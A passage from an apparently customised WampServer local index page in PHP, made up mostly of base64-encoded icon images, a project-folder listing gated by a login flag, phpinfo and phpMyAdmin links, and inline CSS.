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
  134.  
  135. EOFILE;
  136. $gifFile = <<< EOFILE
  137. R0lGODlhFAAUAMQbAP39/fz8/MnJyfv7+/r6+vj4+Pn5+ff398zMzN/f3/X19fHx8fT09MvLy+Li
  138. 4u7u7vLy8tDQ0M7Ozuvr6/b29s3NzePj4+/v7+3t7fPz8/Dw8P///wAAAAAAAAAAAAAAACH5BAEA
  139. ABsALAAAAAAUABQAAAWP4CaOZGme6GkhQuu2CYAixgDcwW1U8SkEh+CBAXkEMJJeSQAoEAoGSubR
  140. PEQSph+BMDAUFBocQJAN5AABw3BxmQTIS7H5qYAsxtmbHu1VKN55aGIDAwUFeHFmimgDBAaAiYpm
  141. hFuIJExnk4SEliNMOJIDinCXZ3I5ZqQjDTZ7qHMIJg4NL7UCCA4puru8GyEAOw==
  142. EOFILE;
  143. $gifCross = <<<EOFILE
  144. iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAADtSURBVHjajFC7DkFREJy9iXg0t+EHRKJDJSqRuIVaJT7AF+jR+xuNRiJyS8WlRaHWeOU+kBy7eyKhs8lkJrOzZ3OWzMAD15gxYhB+yzAm0ndez+eYMYLngdkIf2vpSYbCfsNkOx07n8kgWa1UpptNII5VR/M56Nyt6Qq33bbhQsHy6aR0WSyEyEmiCG6vR2ffB65X4HCwYC2e9CTjJGGok4/7Hcjl+ImLBWv1uCRDu3peV5eGQ2C5/P1zq4X9dGpXP+LYhmYz4HbDMQgUosWTnmQoKKf0htVKBZvtFsx6S9bm48ktaV3EXwd/CzAAVjt+gHT5me0AAAAASUVORK5CYII=
  145. EOFILE;
  146.  
  147.  
  148.  
  149.  
  150.  
  151. //affichage du phpinfo
  152.  
  153. if (isset($_GET['phpinfo']))
  154.  
  155. {
  156.  
  158.  
  159. 	exit();
  160.  
  161. }
  162.  
  163.  
  164.  
  165.  
  166.  
  167. //affichage des images
  168.  
  169. if (isset($_GET['img']))
  170.  
  171. {
  172.  
  173.     switch ($_GET['img'])
  174.  
  175.     {
  176.  
  177.         case 'pngFolder' :
  178.  
  179.         header("Content-type: image/png");
  180.  
  181.         echo base64_decode($pngFolder);
  182.  
  183.         exit();
  184.  
  185.  
  186.  
  187.         case 'pngFolderGo' :
  188.  
  189.         header("Content-type: image/png");
  190.  
  191.         echo base64_decode($pngFolderGo);
  192.  
  193.         exit();
  194.  
  195.  
  196.  
  197.         case 'gifLogo' :
  198.  
  199.         header("Content-type: image/gif");
  200.  
  201.         echo base64_decode($gifLogo);
  202.  
  203.         exit();
  204.  
  205.         case 'pngPlugin' :
  206.  
  207.         header("Content-type: image/png");
  208.  
  209.         echo base64_decode($pngPlugin);
  210.  
  211.         exit();
  212.  
  213.  
  214.  
  215.         case 'pngWrench' :
  216.  
  217.         header("Content-type: image/png");
  218.  
  219.         echo base64_decode($pngWrench);
  220.  
  221.         exit();
  222.  
  223.  
  224.  
  225.         case 'favicon' :
  226.  
  227.         header("Content-type: image/x-icon");
  228.  
  229.         echo base64_decode($favicon);
  230.  
  231.         exit();
  232.  
  233.         case 'gifFile' :
  234.  
  235.         header("Content-type: image/gif");
  236.  
  237.         echo base64_decode($gifFile);
  238.  
  239.         exit();
  240.  
  241.         case 'gifCross' :
  242.  
  243.         header("Content-type: image/gif");
  244.  
  245.         echo base64_decode($gifCross);
  246.  
  247.         exit();
  248.  
  249.  
  250.  
  251.     }
  252.  
  253. }
  254.  
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261. // Définition de la langue et des textes 
  262.  
  263.  
  264.  
  265. if (isset ($_GET['lang']))
  266.  
  267. {
  268.  
  269. 	$langue = $_GET['lang'];
  270.  
  271. }
  272.  
  273. elseif (isset ($_SERVER['HTTP_ACCEPT_LANGUAGE']) AND preg_match("/^fr/", $_SERVER['HTTP_ACCEPT_LANGUAGE']))
  274.  
  275. {
  276.  
  277. 	$langue = 'fr';
  278.  
  279. }
  280.  
  281. else
  282.  
  283. {
  284.  
  285. 	$langue = 'en';
  286.  
  287. }
  288.  
  289.  
  290. // recuperation des projets
  291.  
  292. $handle=opendir(".");
  293.  
  294. $projectContents = '';
  295. $pDir='<ul class="pdir">';
  296. $pFile='<ul class="pfile">';
  297.  
  298. while ($dire = readdir($handle)) 
  299.  
  300. {
  301. 	if(!in_array($dire,$projectsListIgnore)){
  302.  
  303. 		if (is_dir($dire)) 
  304.  
  305. 		{	
  306. 			if($log==true){	
  307.  
  308. 			$pDir .= "<li><a href=\"$dire\">$dire</a></li>";}else{
  309. 			$pDir .= "<li><a>Prohidibo para ti!</a></li>";}
  310.  
  311. 		}
  312. 		elseif(!in_array($dire,$projectsListIgnore))
  313. 		{
  314. 			if(explode("~",$dire)){
  315. 				$dire=str_replace("~","",$dire);
  316. 			}
  317. 			if($log==true){
  318. 			$pFile .= "<li><a href=\"".$dire."\">".$dire."</a></li>";}else{
  319. 			$pFile .= "<li><a>Prohidibo para ti!</a></li>";}
  320. 		}
  321.  
  322. 	}
  323. }
  324. $pDir .= '</ul>';
  325. $pFile .= '</ul>';
  326. $projectContents .= $pDir.$pFile;
  327.  
  328. closedir($handle);
  329.  
  330. if (!isset($projectContents))
  331.  
  332. 	$projectContents = $langues[$langue]['txtNoProjet'];
  333.  
  334.  
  335.  
  336.  
  337.  
  338. //initialisation
  339.  
  340. $phpExtContents = '';
  341.  
  342.  
  343.  
  344. // recuperation des extensions PHP
  345.  
  346. $loaded_extensions = get_loaded_extensions();
  347.  
  348. foreach ($loaded_extensions as $extension)
  349.  
  350. 	$phpExtContents .= "<li>${extension}</li>";
  351.  
  352. // termina pagina de wamp
  353.  
  354. //
  355. if($log==true){
  356. $add='		<ul class="tools">
  357.  
  358. 		<li><a href="?phpinfo=1">phpinfo()</a></li>
  359.  
  360. 		<li><a href="phpmyadmin/">phpmyadmin</a></li>
  361. 		<li><a href="ftp://'.$server.'">Ftp</a></li>
  362. 		</ul>';
  363. }else{
  364. $add="";
  365. }
  366.  
  367. $pag=<<<EOPAGE
  368.  
  369. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
  370.  
  371. 	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
  372.  
  373.  
  374.  
  375. <html lang="en" xml:lang="en">
  376.  
  377. <head>
  378.  
  379. <title>Contenido PC-Castg | Wamp Server</title>
  380.  
  381. 	<meta http-equiv="Content-Type" content="txt/html; charset=utf-8" />
  382.  
  383.  
  384.  
  385. 	<style type="text/css">
  386.  
  387. * {
  388.  
  389. 	margin: 0;
  390.  
  391. 	padding: 0;
  392.  
  393. }
  394.  
  395.  
  396.  
  397. html {
  398.  
  399. 	background: #ddd;
  400.  
  401. }
  402.  
  403. body {
  404.  
  405. 	margin: 1em 10%;
  406.  
  407. 	padding: 1em 3em;
  408.  
  409. 	font: 80%/1.4 tahoma, arial, helvetica, lucida sans, sans-serif;
  410.  
  411. 	border: 1px solid #999;
  412.  
  413. 	background: #eee;
  414.  
  415. 	position: relative;
  416.  
  417. }
  418.  
  419. #head {
  420.  
  421. 	margin-bottom: 1.8em;
  422.  
  423. 	margin-top: 1.8em;
  424.  
  425. 	padding-bottom: 0em;
  426.  
  427. 	border-bottom: 1px solid #999;
  428.  
  429. 	letter-spacing: -500em;
  430.  
  431. 	text-indent: -500em;
  432.  
  433. 	height: 125px;
  434.  
  435. 	background: url(img-index/log.png) 0 0 no-repeat;
  436.  
  437. }
  438.  
  439. .utility {
  440.  
  441. 	position: absolute;
  442.  
  443. 	right: 4em;
  444.  
  445. 	top: 145px;
  446.  
  447. 	font-size: 0.85em;
  448.  
  449. }
  450.  
  451. .utility li {
  452.  
  453. 	display: inline;
  454.  
  455. }
  456.  
  457.  
  458.  
  459. h2 {
  460.  
  461. 	margin: 0.8em 0 0 0;
  462.  
  463. }
  464.  
  465.  
  466.  
  467. ul {
  468.  
  469. 	list-style: none;
  470.  
  471. 	margin: 0;
  472.  
  473. 	padding: 0;
  474.  
  475. }
  476.  
  477. #head ul li, dl ul li, #foot li {
  478.  
  479. 	list-style: none;
  480.  
  481. 	display: inline;
  482.  
  483. 	margin: 0;
  484.  
  485. 	padding: 0 0.2em;
  486.  
  487. }
  488. ul.pfile {
  489.  
  490. 	line-height: 26px;
  491.  
  492. }
  493. ul.pfile a {
  494.  
  495. 	padding-left: 22px;
  496.  
  497. 	background: url(index.php?img=gifFile) 0 50% no-repeat;
  498. }
  499.  
  500. ul.pdir, ul.tools {
  501.  
  502. 	list-style: none;
  503.  
  504. 	line-height: 24px;
  505.  
  506. }
  507.  
  508. ul.pdir a, ul.tools a{
  509.  
  510. 	padding-left: 22px;
  511.  
  512. 	background: url(index.php?img=pngFolder) 0 100% no-repeat;
  513.  
  514. }
  515. li.pfile {
  516.  
  517. 	line-height: 26px;
  518.  
  519. }
  520. li.pfile a {
  521.  
  522. 	padding-left: 22px;
  523.  
  524. 	background: url(index.php?img=gifFile) 0 50% no-repeat;
